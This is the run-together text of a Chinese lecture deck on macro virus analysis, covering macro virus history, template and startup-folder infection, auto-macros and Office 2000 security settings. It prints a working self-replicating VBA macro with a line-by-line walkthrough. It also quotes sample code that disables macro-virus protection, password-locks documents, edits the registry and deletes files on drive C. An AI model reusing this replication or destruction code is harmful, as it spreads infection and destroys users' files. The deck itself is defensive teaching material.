第十講宏病毒分析

第十講

宏病毒分析本講概要本講將針對(duì)宏病毒展開(kāi)詳細(xì)的討論，就宏的概念，宏病毒的歷史，宏病毒原理，破化特性和應(yīng)對(duì)之策進(jìn)行學(xué)習(xí)。2本講目標(biāo) 通過(guò)本講學(xué)習(xí)，學(xué)員應(yīng)該掌握宏病毒的基本知識(shí)，了解宏病毒的機(jī)制和防護(hù)辦法。

與上一講一樣，本章旨在讓學(xué)員能深入了解宏病毒的傳播途徑和方式，以利于更加深刻的理解針對(duì)宏病毒的防御方法和措施，并非要求學(xué)員掌握編寫(xiě)該類(lèi)型病毒的技能。3宏允許用戶(hù)在做一些重復(fù)工作（例如打開(kāi)、修改和保存文件）時(shí)提高自動(dòng)化程度很多主流軟件包括MicrosoftWord,MicrosoftExcel,MicrosoftPowerPoint,Visio,和LotusAmiPro都有很強(qiáng)的編寫(xiě)宏的功能宏4宏并不局限于同一種軟件創(chuàng)建的文件，別的文件類(lèi)型也同樣這使得使用宏編寫(xiě)一個(gè)文件傳播到另一個(gè)文件的病毒程序變得相對(duì)簡(jiǎn)單宏5歷史簡(jiǎn)介第一個(gè)宏病毒–LOTUS123簡(jiǎn)單的宏語(yǔ)言文件的訪問(wèn)是通過(guò)菜單條第一個(gè)真正的宏病毒–DMV(DocumentMacroVirus)December,1994JoelMcNamara是為了示范宏病毒的可能性而編寫(xiě)的第一個(gè)傳播的宏病毒–WM/ConceptSummer,19956各種平臺(tái)以及軟件MicrosoftOfficeWinWordExcelPowerPointAccessAmiProCorelDrawPCMacintoshDECAlphaWindowsMacOSSoftWindows7SoftWindows988VBA3,VBA5,VBA6&Excel宏語(yǔ)言Formula–Excel4.0VBA3–Excel5.0WordBasic–Word6.0VBA5–Office97applicationsVBA6–Office2000注

從WinWord7.0a–1st

以后，微軟的程序開(kāi)始自帶防病毒的警告機(jī)制9VisualBasicforApplicationsJanuary1997微軟發(fā)布Office97(所有的程序都采用VBA5)Word8.0可以轉(zhuǎn)化（重編碼）以前的宏到新的語(yǔ)言版本轉(zhuǎn)化的成功率–90%自動(dòng)刪除常見(jiàn)的宏病毒以阻止它們的傳播WM/Concept.A,WM/Wazzu.A

和WM/Npad.A比WordBasic擁有更復(fù)雜的語(yǔ)言在OLE2文件中，宏用兩種不同的實(shí)體方式存在編譯過(guò)的宏語(yǔ)言體壓縮過(guò)的宏文本10MainTitle,

60pt.,U/Lcase

LS=.8linesOFFICE中的宏11查看宏VisualBasic編輯器注：調(diào)用VB編輯器的快捷方式：Alt-F11查看宏代碼可以點(diǎn)擊Tools>Macro>VisualBasicEditor12禁用宏打開(kāi)時(shí)針對(duì)Office95and97針對(duì)Office200013禁用宏打開(kāi)宏病毒防護(hù)功能(Office97)單擊Tools>Options在Options

對(duì)話(huà)框，選中Macrovirusprotection14禁用宏打開(kāi)宏病毒防護(hù)功能(Office2000)單擊Tools>Macro>Security在Security

對(duì)話(huà)框中，選擇

High或Medium15調(diào)試VBA設(shè)置斷點(diǎn)斷點(diǎn)會(huì)在被設(shè)置的位置中斷程序代碼的執(zhí)行點(diǎn)擊代碼窗口左側(cè)灰色空白處以設(shè)置斷點(diǎn).斷點(diǎn)會(huì)被高亮顯示出來(lái)，并且左邊有一個(gè)紅點(diǎn)顯示16調(diào)試VBA變量的值為了查看一個(gè)變量的值，指向該變量（在調(diào)試模式下）該變量的值會(huì)自動(dòng)顯示出來(lái)17MSWord宏病毒W(wǎng)ord病毒感染通用模板，該文件的名字為NORMAL.DOT.

該文件維護(hù)缺省的和用戶(hù)自定義的關(guān)于MS-Word的設(shè)置該文件的修改會(huì)影響所有后來(lái)用word打開(kāi)的文件18WORD宏病毒的生命周期某個(gè)宏病毒對(duì)文檔取得控制權(quán)該病毒將自身復(fù)制到通用模板通用模板在啟動(dòng)時(shí)自動(dòng)調(diào)用某些受感染文件會(huì)直接查找硬盤(pán)上的相關(guān)文件有時(shí)會(huì)使用最近打開(kāi)的文件列表其它的會(huì)把自己復(fù)制到模板文件中去（類(lèi)似通用模板）19MicrosoftExcel病毒這些病毒在執(zhí)行的時(shí)候會(huì)將自身復(fù)制到其它的Excel文件中去，同時(shí)在Excel的啟動(dòng)文件夾中也會(huì)留下一份拷貝MSExcel在啟動(dòng)的時(shí)候會(huì)自動(dòng)加載在這個(gè)文件夾中的所有文件20EXCEL宏病毒的生命周期Excel病毒在啟動(dòng)文件夾XLSTART中生成一個(gè)新的啟動(dòng)文件Excel在下次運(yùn)行時(shí)加載該文件(PERSONAL.XLS)Excel不檢查文件的后綴名，因此許多病毒遺留下來(lái)的文件就不添加后綴名，比如‘BOOK1’21MicrosoftOfficeAutoMacros這些宏的自動(dòng)執(zhí)行的特點(diǎn)使得病毒的編寫(xiě)成為可能一個(gè)自動(dòng)執(zhí)行的宏語(yǔ)句是指在滿(mǎn)足某個(gè)特定的條件下會(huì)自動(dòng)執(zhí)行，并不需要用戶(hù)顯式的執(zhí)行22AutoMacro范例MicrosoftWordAutoOpen

AutoClose

AutoExec

AutoExit

AutoNewMicrosoftExcelAuto_OpenAuto_CloseAuto_ActivateAuto_Deactivate23菜單關(guān)聯(lián)/快捷鍵將宏和菜單欄的某個(gè)選項(xiàng)相關(guān)聯(lián)刪除和修改菜單欄中的項(xiàng)目將宏和鍵盤(pán)上的某個(gè)鍵相關(guān)聯(lián)這些方法可以取代使用auto-macros的方法取得控制權(quán)24多態(tài)宏病毒舉例W97M/CLASS.A&W97M/STP利用WinWord的編輯功能修改自身的代碼25隱形和加密病毒代碼防止被輕易查看到的措施26隱形和加密：續(xù)27隱形和加密：續(xù)宏病毒存儲(chǔ)時(shí)代碼隨機(jī)打亂28口令保護(hù)WinWord6.0/7.0整個(gè)文件可以進(jìn)行密碼保護(hù)整個(gè)文件被打亂不能訪問(wèn)該文件和其中的宏Office97/2000在文檔用密碼進(jìn)行保護(hù)后，宏語(yǔ)句還是可以被查看到29文件損壞和手動(dòng)編輯WinWord6.0在宏語(yǔ)句進(jìn)行復(fù)制的時(shí)候有一個(gè)程序的錯(cuò)誤這會(huì)導(dǎo)致WM/NPAD200個(gè)不同的變種1997/98-自然的損壞是病毒主要來(lái)源Office97可以用VBE進(jìn)行編輯(ALT+F11)用戶(hù)手動(dòng)編輯出來(lái)的宏是病毒的主要來(lái)源30其它手動(dòng)刪除某些外來(lái)的宏語(yǔ)句防病毒產(chǎn)品沒(méi)有完全將宏病毒正確清除WinWord在復(fù)制宏語(yǔ)句時(shí)異常終止由于Word6.0的其它原因生成的不正常的宏語(yǔ)句VBA5/VBA6在單一模組中允許多項(xiàng)功能和多個(gè)事件操作同時(shí)進(jìn)行Office97/2000–很少有其它情形下產(chǎn)生的宏病毒31混合不同的宏病毒存在在一個(gè)用戶(hù)系統(tǒng)中從其它的宏病毒中”借鑒”從通用模板中的宏語(yǔ)句獲取相應(yīng)的信息相同的病毒往往處在同一類(lèi)型的模組中,稱(chēng)為‘ThisDocument’或‘ThisWorkbook’32病毒代碼SubAutoClose()OnErrorResumeNextApplication.VBE.ActiveVBProject.VBComponents("demo").Export"c:\demo.sys"ForI=1ToNormalTemplate.VBProject.VBComponents.CountIfNormalTemplate.VBProject.VBComponents(I).Name="demo"Then

NormInstall=TrueNextIForI=1ToActiveDocument.VBProject.VBComponents.CountIfActiveDocument.VBProject.VBComponents(I).Name="demo"Then

ActivInstall=TrueNextIIfActivInstall=TrueAndNormInstall=FalseThen SetDobj=NormalTemplate.VBProject

ElseIfActivInstall=FalseAndNormInstall=TrueThen SetDobj=ActiveDocument.VBProjectDobj.VBComponents.Import("c:\demo.sys")EndSub33運(yùn)行邏輯導(dǎo)出到C:\DEMO.SYS(病毒源代碼)檢查是否已經(jīng)安裝在NORMAL.DOT-如果是的話(huà),設(shè)置變量

檢查是否已經(jīng)安裝在活動(dòng)文件中–如果是的話(huà)設(shè)置變量如果在NORMAL.DOT中沒(méi)有的話(huà)將C:\DEMO.SYS導(dǎo)入如果在活動(dòng)文件中沒(méi)有的話(huà)將C:\DEMO.SYS導(dǎo)入34代碼分析

SubAutoClose()當(dāng)文件關(guān)閉時(shí)會(huì)自動(dòng)啟用OnErrorResumeNext如果出錯(cuò),就接下去執(zhí)行下面的指示ForI=1ToNormalTemplate.VBProject.VBComponents.Count在normal.dot

中根據(jù)模組中的數(shù)目重復(fù)執(zhí)行下面的代碼35代碼分析：續(xù)

IfNormalTemplate.VBProject.VBComponents(I).Name="demo"ThenNormInstall=True如果在normal.dot中有名為“demo”的模組，將NormInstall的變量值置為１（true）NextI重復(fù)執(zhí)行一遍ForI=1ToActiveDocument.VBProject.VBComponents.Count根據(jù)活動(dòng)文件中模組的數(shù)目重復(fù)執(zhí)行下面的代碼36代碼分析：續(xù)

IfActiveDocument.VBProject.VBComponents(I).Name="demo"ThenActivInstall=True如果在活動(dòng)文件中有名為“demo”的模組，將ActivInstall的變量值置為１（true）NextI重復(fù)執(zhí)行一次IfActivInstall=TrueAndNormInstall=FalseThenSetDobj=NormalTemplate.VBProject如果在當(dāng)前文檔中安裝完畢，但在normal.dot中沒(méi)有的話(huà)，導(dǎo)入到normal.dot文檔中37代碼分析：續(xù)

ElseIfActivInstall=FalseAndNormInstall=TrueThenSetDobj=ActiveDocument.VBProject另外，如果已經(jīng)安裝在normal.dot中而在當(dāng)前文檔中沒(méi)有的話(huà)，導(dǎo)入到當(dāng)前文檔中

Dobj.VBComponents.Import("c:\demo.sys")這將會(huì)把c:\demo.sys導(dǎo)入到normal.dot或者活動(dòng)文檔，根據(jù)上面設(shè)置的變量值決定SetDobj=ActiveDocument.VBProject這樣的話(huà)，我們只需參考Dobj.VBComponents.Import("c:\demo.sys")`38提示!!!39MainTitle,

60pt.,U/Lcase

LS=.8linesOffice2000和宏的安全性40新特性數(shù)字簽名安全級(jí)別信任源插件和模板防病毒的專(zhuān)用接口Office97的弱點(diǎn)注冊(cè)表的安全設(shè)置41數(shù)字簽名Office2000(Word/Excel/PowerPoint)現(xiàn)在支持?jǐn)?shù)字簽名的VBA宏Access2000不支持?jǐn)?shù)字簽名數(shù)字簽名只被應(yīng)用到VBA項(xiàng)目的內(nèi)容文本內(nèi)容的變化不影響數(shù)字簽名添加新的宏語(yǔ)句會(huì)導(dǎo)致數(shù)字簽名失效42數(shù)字簽名43安全級(jí)別低安全級(jí)別中等安全級(jí)別高安全級(jí)別44低安全級(jí)別沒(méi)有安全保障宏會(huì)完全執(zhí)行，沒(méi)有任何警告提示45中等安全級(jí)別需要征求用戶(hù)的意見(jiàn)是否執(zhí)行宏語(yǔ)句有數(shù)字簽名的宏會(huì)被啟用46高安全級(jí)別禁用沒(méi)有簽名的宏（不會(huì)有警告提示）有數(shù)字簽名的宏可以被禁止或添加到信任列表中去47默認(rèn)的安全級(jí)別Word2000高安全級(jí)別Excel2000&PowerPoint2000中等安全級(jí)別Access2000不支持48信任源這是在高安全級(jí)別時(shí)啟用宏的唯一方法添加一個(gè)發(fā)行者意味著所有該發(fā)行者提供的宏都會(huì)被自動(dòng)啟用這份列表會(huì)被所有的Office程序所共享49信任源50插件和模板對(duì)待安裝的插件和模板的方法是和普通文檔一樣的默認(rèn)情況下，該選項(xiàng)是被禁止的51防毒軟件接口在文件被打開(kāi)之前，調(diào)用注冊(cè)過(guò)的掃描器來(lái)掃描該文件52Office97的弱點(diǎn)Word97模板的安全補(bǔ)丁Word97&右鍵快捷打印Excel97調(diào)用功能的補(bǔ)丁53Word97模板的安全補(bǔ)丁歷史針對(duì)包含帶宏的模板的文檔，Word97打開(kāi)這種文檔中包含的宏時(shí)并不進(jìn)行任何提示糾正措施安全級(jí)別保護(hù)和宏掃描應(yīng)用于附加的模板54Word97&右鍵快捷打印歷史當(dāng)文件在使用右鍵快捷打印功能時(shí)，關(guān)于宏病毒的防護(hù)功能并沒(méi)有被啟用糾正措施安全級(jí)別保護(hù)和宏掃描應(yīng)用于右鍵快捷打印55Excel97調(diào)用功能的補(bǔ)丁歷史Excel工作簿可以調(diào)用動(dòng)態(tài)鏈接庫(kù)針對(duì)這種情況的宏，保護(hù)措施并沒(méi)有給出預(yù)警糾正措施將工作簿的調(diào)用功能禁止56注冊(cè)表的安全設(shè)置關(guān)于安全設(shè)置的注冊(cè)表位置HKEY_CURRENT_USER\Software\Microsoft\Office\NN.0\Word\Security57Office2000白皮書(shū)HTTP://OFFICE.MICROSOFT.COM/DOWNLOADS/2000/O2KSEC.ASPX58推薦的設(shè)置將所有的Office2000程序的安全級(jí)別設(shè)置為高禁用‘Trustallinstalledadd-insandtemplates’選項(xiàng)將Excel4.0-類(lèi)型的宏轉(zhuǎn)化為VBA將所有的宏簽名，包括插件和模板在注冊(cè)表中的鍵值設(shè)置并鎖定為高安全級(jí)別使用防毒軟件進(jìn)行對(duì)所有使用的文件進(jìn)行掃描59Office宏病毒的某些癥狀文件的大小增加了

工具欄上的菜單條被改動(dòng)過(guò)打開(kāi)一個(gè)文件時(shí)，CPU利用率變的很高無(wú)法打開(kāi)最近使用過(guò)的一些文檔60建議的清除措施使用專(zhuān)業(yè)的防毒軟件進(jìn)行對(duì)宏病毒的自動(dòng)清除61MainTitle,

60pt.,U/Lcase

LS=.8lines宏病毒的代碼示范62SubAutoOpen()Options.VirusProtection=FalseOptions.ConfirmConversions=FalseOptions.SaveNormalPrompt=FalseIfDay(Now)=Hour(Now)ThenSetFunnyShit=ActiveDocumentFunnyShit.Password="ZeRg1.0"ActiveDocument.SaveEndIf與自動(dòng)執(zhí)行的宏關(guān)聯(lián)舉例:W97M_ZERG.AVirusCode63SYSTEM.PRIVATEPROFILESTRING("","HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\OFFICE\8.0\NEWUSERSETTINGS\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")=""注冊(cè)表修改舉例:WM_TRISTATE64KILL"C:\*.*"KILL"C:\MYDOCUMENTS\*.*"KILL"C:\WIN